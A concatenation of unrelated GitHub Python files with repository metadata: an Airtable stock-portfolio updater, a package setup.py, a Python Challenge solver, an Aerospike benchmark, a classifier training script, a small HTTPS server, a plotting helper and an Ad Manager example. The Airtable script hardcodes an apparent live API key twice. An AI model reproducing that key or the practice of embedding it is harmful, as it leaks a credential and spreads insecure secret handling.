k not in ignore_keys}
if len(transformed) == 1:
return list(transformed.values())[0]
else:
return transformed
else:
return response
def GetStockInfo(ticker, existing_stock_info):
ticker = ticker.upper()
GetAlphaAdvantageApproval()
response = requests.get(url='https://www.alphavantage.co/query',
params={'function': 'TIME_SERIES_DAILY_ADJUSTED', 'symbol': ticker,
'apikey': ALPHA_ADVANTAGE_KEY,
'outputsize': 'full'}).json()
close_prices = CleanupAlphaAdvantageResponse(response)
if not close_prices or not isinstance(close_prices, dict):
print('{} Fail {}'.format(arrow.utcnow(), ticker))
# This request failed. If we have old data, return it.
return existing_stock_info.get(ticker, None)
print('{} Success {}'.format(arrow.utcnow(), ticker))
reverse_sorted_dates = sorted(close_prices.keys(), reverse=True)
# 1w before a sunday is a sunday. There will be no stock info.
# So we need to find the nearest day before that day.
def nearest_close_price(days_ago):
date = DateNDaysAgo(days_ago)
for market_date in reverse_sorted_dates:
if market_date <= date:
return close_prices[market_date]
return float('nan')
last_updated = max(close_prices.keys())
latest_price = close_prices.get(last_updated, float('nan'))
return StockInfo(ticker=ticker, price=latest_price, last_updated=last_updated,
week_ago=nearest_close_price(7),
mo_ago=nearest_close_price(31),
quarter_ago=nearest_close_price(91),
yr_ago=nearest_close_price(365))
def ReadPortfolioTable():
response = requests.get(
url='https://api.airtable.com/v0/{}/{}'.format(AIRTABLE_BASE_ID, PORTFOLIO_TABLE_NAME),
params={'api_key': 'key5s6LLGY7y5wbDp'}).json()
if 'records' not in response:
return None
ret = dict()
for record in response['records']:
# Same stock can be present in multiple rows.
ticker, count, row_id = record['fields']['Ticker'], record['fields']['Quantity'], record[
'id']
if ticker in ret:
existing = ret[ticker]
existing.count += count
existing.row_ids.append(row_id)
else:
ret[ticker] = PortfolioItem(ticker=ticker, row_ids=[row_id], count=count,
stock_info=None)
return ret
def ClearStocksTable():
# Removes all info from stocks table.
response = requests.get(
url='https://api.airtable.com/v0/{}/{}'.format(AIRTABLE_BASE_ID, STOCKS_TABLE_NAME),
params={'api_key': 'key5s6LLGY7y5wbDp'}).json()
if 'records' not in response:
return None
for record in response['records']:
requests.delete(
url='https://api.airtable.com/v0/{}/{}/{}'.format(AIRTABLE_BASE_ID, STOCKS_TABLE_NAME,
record['id']),
headers={'Authorization': 'Bearer {}'.format(AIRTABLE_KEY)})
def UpdatePortfolioTable(portfolio):
for pf_item in portfolio.values():
if not pf_item.stock_info:
continue
# Update portfolio table with the latest stock price.
for row_id in pf_item.row_ids:
url = 'https://api.airtable.com/v0/{}/{}/{}'.format(AIRTABLE_BASE_ID,
PORTFOLIO_TABLE_NAME, row_id)
requests.patch(url=url, headers={'Authorization': 'Bearer {}'.format(AIRTABLE_KEY)},
json={'fields': {'Current Price': pf_item.stock_info.price}})
def UpdateStocksTable(portfolio):
# Delete stocks table data.
ClearStocksTable()
# Update the stocks table with new data from portfolio.
for pf_item in portfolio.values():
if not pf_item.stock_info:
continue
url = 'https://api.airtable.com/v0/{}/{}'.format(AIRTABLE_BASE_ID, STOCKS_TABLE_NAME)
def historical_price(old_price, current_price):
old_price, current_price = float(old_price), float(current_price)
up_down = '⬆️' if (current_price > old_price) else '🔻'
return '${} {:.1f}% {}'.format(old_price,
abs(current_price - old_price) * 100.0 / old_price,
up_down)
stock_info = pf_item.stock_info
record = {
'fields': {
'Name': stock_info.ticker,
'Price': stock_info.price,
'1w ago': historical_price(stock_info.week_ago, stock_info.price),
'1mo ago': historical_price(stock_info.mo_ago, stock_info.price),
'3mo ago': historical_price(stock_info.quarter_ago, stock_info.price),
'1yr ago': historical_price(stock_info.yr_ago, stock_info.price),
'Last updated': stock_info.last_updated,
'Value Owned': stock_info.price * pf_item.count
}}
print(url)
print(record)
requests.post(url=url, headers={'Authorization': 'Bearer {}'.format(AIRTABLE_KEY)},
json=record)
def WriteStocksToCSV(fn, ticker_to_stocks):
import csv
with open(fn, 'w') as csvfile:
csv_writer = csv.DictWriter(csvfile,
fieldnames=[field.name for field in attr.fields(StockInfo)],
delimiter=',')
csv_writer.writeheader()
for _, stock in ticker_to_stocks.items():
csv_writer.writerow(attr.asdict(stock))
def ReadStocksFromCSVOrReturnEmpty(fn):
try:
import csv
with open(fn, 'r') as csvfile:
csv_reader = csv.DictReader(csvfile, delimiter=',')
return {s['ticker']: StockInfo(**s) for s in csv_reader}
except Exception:
return dict()
def UpdateAirtable():
def EnhancePortfolioItem(portfolio_item, stock_info):
# Adds stock info to the portfolio item.
portfolio_item.stock_info = stock_info
return portfolio_item
# Read: Existing stock info from disk.
existing_stock_info = ReadStocksFromCSVOrReturnEmpty(STOCK_INFO_CSV)
# Read: Stocks, Count, Airtable row ids
portfolio_without_price = ReadPortfolioTable()
if portfolio_without_price is None:
# Failure.
return
# Compute: StockInfo for all the stocks and enhance the portfolio info.
portfolio_with_price = {
ticker: EnhancePortfolioItem(folio_item, GetStockInfo(ticker, existing_stock_info)) for
ticker, folio_item in
# Shuffle the list to make sure the same stocks dont get rate limited again and again.
DictToShuffledList(portfolio_without_price)
}
# Update tables
UpdatePortfolioTable(portfolio_with_price)
UpdateStocksTable(portfolio_with_price)
# Update Stock Info CSV
WriteStocksToCSV(STOCK_INFO_CSV,
{ticker: portfolio_item.stock_info for ticker, portfolio_item in
portfolio_with_price.items() if
portfolio_item.stock_info is not None})
if __name__ == '__main__':
UpdateAirtable()
|
{
"content_hash": "f44ffbc5b250dca02946050e7a060ddb",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 100,
"avg_line_length": 38.34701492537314,
"alnum_prop": 0.6012454996594336,
"repo_name": "dotslash/MiniProjects",
"id": "90a1590aacb3d24daceab902103c9acf2dcfc562",
"size": "10308",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "archive/AirTableStocks/airtable_stocks.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "24680"
},
{
"name": "Java",
"bytes": "4520"
},
{
"name": "Python",
"bytes": "47813"
}
],
"symlink_target": ""
}
|
import os
import sys
from setuptools import setup, find_packages
from setuptools.command.test import test
class Tox(test):
def finalize_options(self):
test.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import tox
errno = tox.cmdline(self.test_args)
sys.exit(errno)
setup(
name='waapuro',
description='A dead-simple hiragana and katakana romanization library',
version='1.0.1',
author='Kevin Xiwei Zheng',
author_email='blankplacement+waapuro@gmail.com',
url='https://github.com/kxz/waapuro',
license='X11',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: Japanese',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Topic :: Software Development :: Libraries'],
keywords='japanese kana hiragana katakana romanization',
packages=find_packages(),
install_requires=[
'future'],
tests_require=[
'tox'],
cmdclass={
'test': Tox})
|
{
"content_hash": "e9a6b484ef85fc316fac30cf3adc76b1",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 75,
"avg_line_length": 28.934782608695652,
"alnum_prop": 0.6153268219383922,
"repo_name": "kxz/waapuro",
"id": "97d052f371ad6c9a487bf3ca5b9a367d67968573",
"size": "1353",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7573"
}
],
"symlink_target": ""
}
|
import re
import zipfile
def main():
'''
Hint: zip, now there are pairs
In the readme.txt:
welcome to my zipped list.
hint1: start from 90052
hint2: answer is inside the zip
Last nothing = 46145
Collect the comments
'''
nothing = '90052'
file_ext = '.txt'
file_pattern = re.compile(r'Next nothing is (\d+)')
zf = zipfile.ZipFile('./zip_chall_06/channel.zip')
comments = []
while True:
filename = nothing + file_ext
data = zf.read(filename).decode('utf-8')
match = re.search(file_pattern, data)
if match:
nothing = match.group(1)
# com = zf.getinfo(filename).comment.decode('utf-8')
comments.append(zf.getinfo(filename).comment.decode('utf-8'))
# print('Comment: {}'.format(com))
else:
break
# print('Last nothing is: {}'.format(nothing))
print(''.join(comments))
return 0
if __name__ == '__main__':
main()
|
{
"content_hash": "34f105f9ed3f0344cc495260f6bc652f",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 73,
"avg_line_length": 23.069767441860463,
"alnum_prop": 0.5655241935483871,
"repo_name": "HKuz/PythonChallenge",
"id": "3c754f784bc80017d9e863abf925804b68c87b20",
"size": "1174",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Challenges/chall_06.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "OpenEdge ABL",
"bytes": "5003"
},
{
"name": "Python",
"bytes": "61570"
}
],
"symlink_target": ""
}
|
"""Runs Aerospike (http://www.aerospike.com).
Aerospike is an opensource NoSQL solution. This benchmark runs a read/update
load test with varying numbers of client threads against an Aerospike server.
This test can be run in a variety of configurations including memory only,
remote/persistent ssd, and local ssd. The Aerospike configuration is controlled
by the "aerospike_storage_type" and "data_disk_type" flags.
"""
import re
from perfkitbenchmarker import configs
from perfkitbenchmarker import data
from perfkitbenchmarker import disk
from perfkitbenchmarker import flags
from perfkitbenchmarker import sample
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.linux_packages import aerospike_server
FLAGS = flags.FLAGS
flags.DEFINE_integer('aerospike_min_client_threads', 8,
'The minimum number of Aerospike client threads.',
lower_bound=1)
flags.DEFINE_integer('aerospike_max_client_threads', 128,
'The maximum number of Aerospike client threads.',
lower_bound=1)
flags.DEFINE_integer('aerospike_client_threads_step_size', 8,
'The number to increase the Aerospike client threads by '
'for each iteration of the test.',
lower_bound=1)
flags.DEFINE_integer('aerospike_read_percent', 90,
'The percent of operations which are reads.',
lower_bound=0, upper_bound=100)
flags.DEFINE_integer('aerospike_num_keys', 1000000,
'The number of keys to load Aerospike with. The index '
'must fit in memory regardless of where the actual '
'data is being stored and each entry in the '
'index requires 64 bytes.')
BENCHMARK_NAME = 'aerospike'
BENCHMARK_CONFIG = """
aerospike:
description: Runs Aerospike.
vm_groups:
workers:
vm_spec: *default_single_core
disk_spec: *default_500_gb
vm_count: null
disk_count: 0
client:
vm_spec: *default_single_core
"""
AEROSPIKE_CLIENT = 'https://github.com/aerospike/aerospike-client-c.git'
CLIENT_DIR = 'aerospike-client-c'
CLIENT_VERSION = '4.0.4'
PATCH_FILE = 'aerospike.patch'
def GetConfig(user_config):
config = configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME)
if (FLAGS.aerospike_storage_type == aerospike_server.DISK and
FLAGS.data_disk_type != disk.LOCAL):
config['vm_groups']['workers']['disk_count'] = 1
return config
def CheckPrerequisites():
"""Verifies that the required resources are present.
Raises:
perfkitbenchmarker.data.ResourceNotFound: On missing resource.
"""
data.ResourcePath(PATCH_FILE)
def _PrepareClient(client):
"""Prepare the Aerospike C client on a VM."""
client.Install('build_tools')
client.Install('lua5_1')
client.Install('openssl')
clone_command = 'git clone %s'
client.RemoteCommand(clone_command % AEROSPIKE_CLIENT)
build_command = ('cd %s && git checkout %s && git submodule update --init '
'&& make')
client.RemoteCommand(build_command % (CLIENT_DIR, CLIENT_VERSION))
# Apply a patch to the client benchmark so we have access to average latency
# of requests. Switching over to YCSB should obviate this.
client.PushDataFile(PATCH_FILE)
benchmark_dir = '%s/benchmarks/src/main' % CLIENT_DIR
client.RemoteCommand('cp aerospike.patch %s' % benchmark_dir)
client.RemoteCommand('cd %s && patch -p1 -f < aerospike.patch'
% benchmark_dir)
client.RemoteCommand('sed -i -e "s/lpthread/lpthread -lz/" '
'%s/benchmarks/Makefile' % CLIENT_DIR)
client.RemoteCommand('cd %s/benchmarks && make' % CLIENT_DIR)
def Prepare(benchmark_spec):
"""Install Aerospike server on one VM and Aerospike C client on the other.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
"""
client = benchmark_spec.vm_groups['client'][0]
workers = benchmark_spec.vm_groups['workers']
def _Prepare(vm):
if vm == client:
_PrepareClient(vm)
else:
aerospike_server.ConfigureAndStart(vm, [workers[0].internal_ip])
vm_util.RunThreaded(_Prepare, benchmark_spec.vms)
def Run(benchmark_spec):
"""Runs a read/update load test on Aerospike.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Returns:
A list of sample.Sample objects.
"""
client = benchmark_spec.vm_groups['client'][0]
servers = benchmark_spec.vm_groups['workers']
samples = []
def ParseOutput(output):
"""Parses Aerospike output.
Args:
output: The stdout from running the benchmark.
Returns:
A tuple of average TPS and average latency.
"""
read_latency = re.findall(
r'read.*Overall Average Latency \(ms\) ([0-9]+\.[0-9]+)\n', output)[-1]
write_latency = re.findall(
r'write.*Overall Average Latency \(ms\) ([0-9]+\.[0-9]+)\n', output)[-1]
average_latency = (
(FLAGS.aerospike_read_percent / 100.0) * float(read_latency) +
((100 - FLAGS.aerospike_read_percent) / 100.0) * float(write_latency))
tps = map(int, re.findall(r'total\(tps=([0-9]+) ', output))
return float(sum(tps)) / len(tps), average_latency
load_command = ('./%s/benchmarks/target/benchmarks -z 32 -n test -w I '
'-o B:1000 -k %s -h %s' %
(CLIENT_DIR, FLAGS.aerospike_num_keys,
','.join(s.internal_ip for s in servers)))
client.RemoteCommand(load_command, should_log=True)
max_throughput_for_completion_latency_under_1ms = 0.0
for threads in range(FLAGS.aerospike_min_client_threads,
FLAGS.aerospike_max_client_threads + 1,
FLAGS.aerospike_client_threads_step_size):
load_command = ('timeout 60 ./%s/benchmarks/target/benchmarks '
'-z %s -n test -w RU,%s -o B:1000 -k %s '
'--latency 5,1 -h %s;:' %
(CLIENT_DIR, threads, FLAGS.aerospike_read_percent,
FLAGS.aerospike_num_keys,
','.join(s.internal_ip for s in servers)))
stdout, _ = client.RemoteCommand(load_command, should_log=True)
tps, latency = ParseOutput(stdout)
metadata = {
'Average Transactions Per Second': tps,
'Client Threads': threads,
'Storage Type': FLAGS.aerospike_storage_type,
'Read Percent': FLAGS.aerospike_read_percent,
}
samples.append(sample.Sample('Average Latency', latency, 'ms', metadata))
if latency < 1.0:
max_throughput_for_completion_latency_under_1ms = max(
max_throughput_for_completion_latency_under_1ms,
tps)
samples.append(sample.Sample(
'max_throughput_for_completion_latency_under_1ms',
max_throughput_for_completion_latency_under_1ms,
'req/s'))
return samples
def Cleanup(benchmark_spec):
"""Cleanup Aerospike.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
"""
servers = benchmark_spec.vm_groups['workers']
client = benchmark_spec.vm_groups['client'][0]
client.RemoteCommand('sudo rm -rf aerospike*')
def StopServer(server):
server.RemoteCommand('cd %s && nohup sudo make stop' %
aerospike_server.AEROSPIKE_DIR)
server.RemoteCommand('sudo rm -rf aerospike*')
vm_util.RunThreaded(StopServer, servers)
|
{
"content_hash": "ec18776eb5eb20c80b883e404e51c428",
"timestamp": "",
"source": "github",
"line_count": 212,
"max_line_length": 80,
"avg_line_length": 35.83490566037736,
"alnum_prop": 0.6509148348032118,
"repo_name": "xiaolihope/PerfKitBenchmarker-1.7.0",
"id": "4eb25c544a79ce3c877dff62273359102c744c19",
"size": "8208",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "perfkitbenchmarker/linux_benchmarks/aerospike_benchmark.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Lua",
"bytes": "1547"
},
{
"name": "Python",
"bytes": "1727478"
},
{
"name": "Shell",
"bytes": "23457"
}
],
"symlink_target": ""
}
|
'''
Created on Aug 9, 2013
@author: jimzhai
功能:分类学习模块
training(self,fileName): 对分析器进行训练
reportPrecision(self,fileName):报告分析器对测试文本分析的精度
'''
from pymining.math.text2matrix import Text2Matrix
from pymining.common.global_info import GlobalInfo
from pymining.common.configuration import Configuration
from pymining.preprocessor.chisquare_filter import ChiSquareFilter
from pymining.classifier.naive_bayes import NaiveBayes
class ArticleCategoriesTrain(object):
def training(self,fileName,xml_path):
config = Configuration.FromFile(xml_path)
GlobalInfo.Init(config, "__global__")
txt2mat = Text2Matrix(config, "__matrix__")
[trainx, trainy] = txt2mat.CreateTrainMatrix(fileName)
chiFilter = ChiSquareFilter(config, "__filter__")
chiFilter.TrainFilter(trainx, trainy)
[trainx, trainy] = chiFilter.MatrixFilter(trainx, trainy)
nbModel = NaiveBayes(config, "naive_bayes")
nbModel.Train(trainx, trainy)
# training
def reportPrecision(self,fileName,xml_path):
config = Configuration.FromFile(xml_path)
GlobalInfo.Init(config, "__global__", True)
txt2mat = Text2Matrix(config, "__matrix__", True)
chiFilter = ChiSquareFilter(config, "__filter__", True)
nbModel = NaiveBayes(config, "naive_bayes", True)
[testx, testy] = txt2mat.CreatePredictMatrix("data/"+fileName)
[testx, testy] = chiFilter.MatrixFilter(testx, testy)
[resultY, precision] = nbModel.Test(testx, testy)
print precision
# reportPrecision
if __name__ == "__main__":
ArticleCategoriesTrain().training("data/keywordtrain.txt","conf/articleCategoriesConfiguration.xml")
#ArticleCategoriesTrain().reportPrecision("test copy.txt")
|
{
"content_hash": "c48f8de376f1421bb49186f5661d461e",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 104,
"avg_line_length": 38.391304347826086,
"alnum_prop": 0.7021517553793885,
"repo_name": "zhaishuai/NewsfeedsService",
"id": "9b7044c28c9a42445a8701a9856e15574e7fe809",
"size": "1853",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "NewsfeedsService/NewsfeedsSoftware/article_categories_package/ArticleCategoriesTrain.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1245"
},
{
"name": "JavaScript",
"bytes": "80280"
},
{
"name": "Python",
"bytes": "216331"
}
],
"symlink_target": ""
}
|
import BaseHTTPServer, SimpleHTTPServer
import ssl
httpd = BaseHTTPServer.HTTPServer(('localhost', 4443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
|
{
"content_hash": "2935df11f8e68c0d43d82ba5f82b7d69",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 97,
"avg_line_length": 43.5,
"alnum_prop": 0.8045977011494253,
"repo_name": "yukihirai0505/tutorial-program",
"id": "f33813b221cbfd0b235b9f82cd194b5a7187edc8",
"size": "261",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "programming/js/adobe/creative-cloud/web-image-editor-drag-and-drop-master/https-server.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "2253"
},
{
"name": "CMake",
"bytes": "140"
},
{
"name": "CSS",
"bytes": "19009"
},
{
"name": "Dockerfile",
"bytes": "3059"
},
{
"name": "Elixir",
"bytes": "134"
},
{
"name": "Gherkin",
"bytes": "370"
},
{
"name": "Go",
"bytes": "6176"
},
{
"name": "HTML",
"bytes": "47121"
},
{
"name": "Java",
"bytes": "5923"
},
{
"name": "JavaScript",
"bytes": "81136"
},
{
"name": "Objective-C",
"bytes": "3921"
},
{
"name": "PHP",
"bytes": "471"
},
{
"name": "Python",
"bytes": "31498"
},
{
"name": "Rust",
"bytes": "5142"
},
{
"name": "Scala",
"bytes": "66347"
},
{
"name": "Shell",
"bytes": "261"
}
],
"symlink_target": ""
}
|
import logging
#import pylab
import matplotlib.pyplot as plt
from skimage import measure
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
class Plotter(object):
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
def plot_3d(self, image, threshold=-300):
"""
Adapted from:
https://www.kaggle.com/gzuidhof/data-science-bowl-2017/full-preprocessing-tutorial
"""
# Position the scan upright,
# so the head of the patient would be at the top facing the camera
p = image.transpose(2,1,0)
verts, faces = measure.marching_cubes(p, threshold)
fig = plt.figure(figsize=(10, 10))
ax = fig.add_subplot(111, projection='3d')
# Fancy indexing: `verts[faces]` to generate a collection of triangles
mesh = Poly3DCollection(verts[faces], alpha=0.1)
face_color = [0.5, 0.5, 1]
mesh.set_facecolor(face_color)
ax.add_collection3d(mesh)
ax.set_xlim(0, p.shape[0])
ax.set_ylim(0, p.shape[1])
ax.set_zlim(0, p.shape[2])
plt.show()
def plot(dataset):
log.info("plotting {}".format(dataset.PatientsName))
#pylab.imshow(dataset.pixel_array, cmap=pylab.cm.bone)
def save(dataset):
log.info("saving {}".format(dataset.PatientsName))
pylab.imshow(dataset.pixel_array, cmap=pylab.cm.bone)
pylab.savefig(dataset.PatientsName + '.png',
bbox_inches='tight')
|
{
"content_hash": "c51e24e6ae39f17947dbdeb5c7d7c131",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 90,
"avg_line_length": 32.15217391304348,
"alnum_prop": 0.6382691007437458,
"repo_name": "2PacIsAlive/DeepOncology",
"id": "be4f91f2a1b78b948761fccd6f45c39174857ccc",
"size": "1479",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "deep_networks/data/dicom/plot.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "15124"
},
{
"name": "Python",
"bytes": "18987"
}
],
"symlink_target": ""
}
|
"""This example creates custom fields.
To determine which custom fields exist, run get_all_custom_fields.py.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
import uuid
# Import appropriate modules from the client library.
from googleads import ad_manager
def main(client):
# Initialize appropriate service.
custom_field_service = client.GetService(
'CustomFieldService', version='v202208')
# Create custom field objects.
custom_fields = [
{
'name': 'Customer comments #%s' % uuid.uuid4(),
'entityType': 'LINE_ITEM',
'dataType': 'STRING',
'visibility': 'FULL'
}, {
'name': 'Internal approval status #%s' % uuid.uuid4(),
'entityType': 'LINE_ITEM',
'dataType': 'DROP_DOWN',
'visibility': 'FULL'
}
]
# Add custom fields.
custom_fields = custom_field_service.createCustomFields(custom_fields)
# Display results.
for custom_field in custom_fields:
print('Custom field with ID "%s" and name "%s" was created.'
% (custom_field['id'], custom_field['name']))
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client)
|
{
"content_hash": "d0fdeed77211b38dea8edccf1f7eade9",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 77,
"avg_line_length": 28.96,
"alnum_prop": 0.6636740331491713,
"repo_name": "googleads/googleads-python-lib",
"id": "ece4fb1b84fe1928ea21a2cd56d5f01e30327c16",
"size": "2070",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "examples/ad_manager/v202208/custom_field_service/create_custom_fields.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "403821"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.